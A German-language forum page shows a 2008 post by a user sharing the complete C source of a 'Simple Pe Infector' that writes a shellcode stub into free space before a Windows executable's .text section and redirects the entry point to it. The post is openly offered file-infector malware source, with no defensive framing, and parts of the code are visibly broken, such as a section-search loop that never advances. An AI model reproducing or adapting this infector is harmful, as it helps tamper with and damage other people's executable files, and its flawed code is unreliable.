PHP Forum - Coding Board
Juni 18, 2018, 03:14:41 *
Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername, Passwort und Sitzungslänge
News:
 
   Übersicht   Hilfe Suche Einloggen Registrieren  
Seiten: [1]
  Drucken  
Autor Thema: Pe infector  (Gelesen 151 mal)
0 Mitglieder und 1 Gast betrachten dieses Thema.
Syler
Sr. Member
****
Beiträge: 467



Profil anzeigen E-Mail
« am: September 20, 2008, 05:52:56 »

Code:
/* Simple Pe Infector By _antony (c) [url]http://sav1or.name*/[/url]
/* infecting method:
   find a free space in pe header;
   how it works?
   we find PointerToRawData of .text section because system loader put's her first
   then we use my simple formulation :
   delta = PointerToRawData - sizeof(code) and scan this space of memmory if it's free infect file and
   change OEP to delta.
   may be it will be more correct to use
   delta = PointerToRawData - (sizeof(code) + some more)

*/
/* iamge presentation
   ------------------
   |  PE HEADER     |
   |________________|
   |                |
   |                |
   |  OBJECT TABLE  |
   |________________|                
   |                |
   |                |
   | FREE SPACE     |          
   | our code       |
   |________________|
   |                |
   |.text section   |
   | next section   |
   | next section   |
   | .............. |
   |                |
   ------------------
*/
#include<windows.h>
#include<stdio.h>
GetTextSectionOffset(PIMAGE_SECTION_HEADER pSectionHeader , int NumberOfSections)
{
while(NumberOfSections > 0)
{
if( !strcmpi((char*)pSectionHeader->Name , &quot;.text&quot;))
{
return pSectionHeader->PointerToRawData;
}
}
/* we did not find .text section */
return 0;
}
/* entry point */
int main(int argc , char *argv[])
{
HANDLE hFile;
HANDLE hMap;
char *MappedFile = 0;
DWORD FileSize; /* file size */
DWORD delta;  
DWORD SectionOffset; /* .text section offset*/
DWORD func_addr;
IMAGE_DOS_HEADER *pDosHeader;
IMAGE_NT_HEADERS *pNtHeader;
IMAGE_SECTION_HEADER *pSecHeader;
/* shell code*/
char code[] = &quot;\x6A\x00&quot;              /*push 0 */
         &quot;\xB8\x00\x00\x00\x00&quot;  /*mov eax , func_addr (address will be inserted automaticly)*/
         &quot;\xFF\xD0&quot;;             /*call eax */
if(argc < 2)
{
printf(&quot;parameters : ssv.exe [filename] \n&quot;);
printf(&quot;simple pe infector by _antony \n&quot;);
return 0;
}
printf(&quot;target: [%s] \n&quot; , argv[1]);
/* open file */
hFile = CreateFile(argv[1] ,
              GENERIC_WRITE | GENERIC_READ ,
  0 ,
  0 ,
  OPEN_EXISTING ,
  FILE_ATTRIBUTE_NORMAL ,
  0);
if(hFile == INVALID_HANDLE_VALUE)
{
printf(&quot;[Error]: Can't open File! Error code : %d&quot; , GetLastError());
return -1;
}
/* get file size */
FileSize = GetFileSize(hFile , 0 );
printf(&quot;[File Size ]: %d \n&quot;, FileSize);
/* mapping file */
hMap = CreateFileMapping(hFile ,
                    0 ,
PAGE_READWRITE ,
0 ,
FileSize ,
0);
if(hMap == INVALID_HANDLE_VALUE)
{
printf(&quot;[Error]: Can't map file! Error code: %d\n&quot; , GetLastError());
CloseHandle(hFile);
return -1;
}
MappedFile = (char*)MapViewOfFile(hMap , FILE_MAP_READ | FILE_MAP_WRITE , 0 , 0 , FileSize);
if(MappedFile == NULL)
{
printf(&quot;[Error]: Can't map file! Error code %d\n&quot;, GetLastError());
CloseHandle(hFile);
CloseHandle(hMap);
UnmapViewOfFile(MappedFile);
return -1;
}
pDosHeader = (IMAGE_DOS_HEADER*)MappedFile;
pNtHeader  = (IMAGE_NT_HEADERS*)((DWORD)MappedFile + pDosHeader->e_lfanew);
pSecHeader = IMAGE_FIRST_SECTION(pNtHeader);
    /* get .text section PointerToRawData*/
SectionOffset = GetTextSectionOffset(pSecHeader , pNtHeader->FileHeader.NumberOfSections);
if(SectionOffset == 0)
{
printf(&quot;[Error]: Can't find .text section!\n&quot;);
CloseHandle(hFile);
CloseHandle(hMap);
UnmapViewOfFile(MappedFile);
return -1;
}
delta = SectionOffset - sizeof(code);
int i;
BYTE check;
printf(&quot;scanning...\n&quot;);
/* scanning space  if there are only 00 then we infect file */
for(i=0 ; i<sizeof(code) ; i++)
{
      check = *((BYTE*)MappedFile + delta + i);
 printf(&quot;%X \t&quot;, check);
 if(check != 0)
 {
 printf(&quot;There is some data...\n&quot;);
 CloseHandle(hFile);
 CloseHandle(hMap);
 UnmapViewOfFile(MappedFile);
 return -1;
 }
}
 printf(&quot;Space if free , infecting File...\n&quot;);
 /* insert function address in shell code */
 func_addr = (DWORD)GetProcAddress( LoadLibrary(&quot;kernel32.dll&quot;) , &quot;ExitProcess&quot;);
 for(i=0 ; i < sizeof(code) ; i++ )
 {
 if( *(DWORD*)&code[i] == 0x00000B8)
 {
 *(DWORD*)(code+i+1)= func_addr;
 }
 }
 printf(&quot;Old Entry Point : %08X \n&quot; , pNtHeader->OptionalHeader.AddressOfEntryPoint);
 memcpy(MappedFile+delta , code , sizeof(code));
 /* new entry point */
 pNtHeader->OptionalHeader.AddressOfEntryPoint = delta;
          printf(&quot;File infected!\n&quot;);
 printf(&quot;New Entry Point: %08X \n&quot; , delta);
 CloseHandle(hFile);
 CloseHandle(hMap);
 UnmapViewOfFile(MappedFile);
 return 0;
}


Syler
Gespeichert


Seiten: [1]
  Drucken  
 
Gehe zu:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.21 | SMF © 2006-2009, Simple Machines | New Look by Nolt Prüfe XHTML 1.0 Prüfe CSS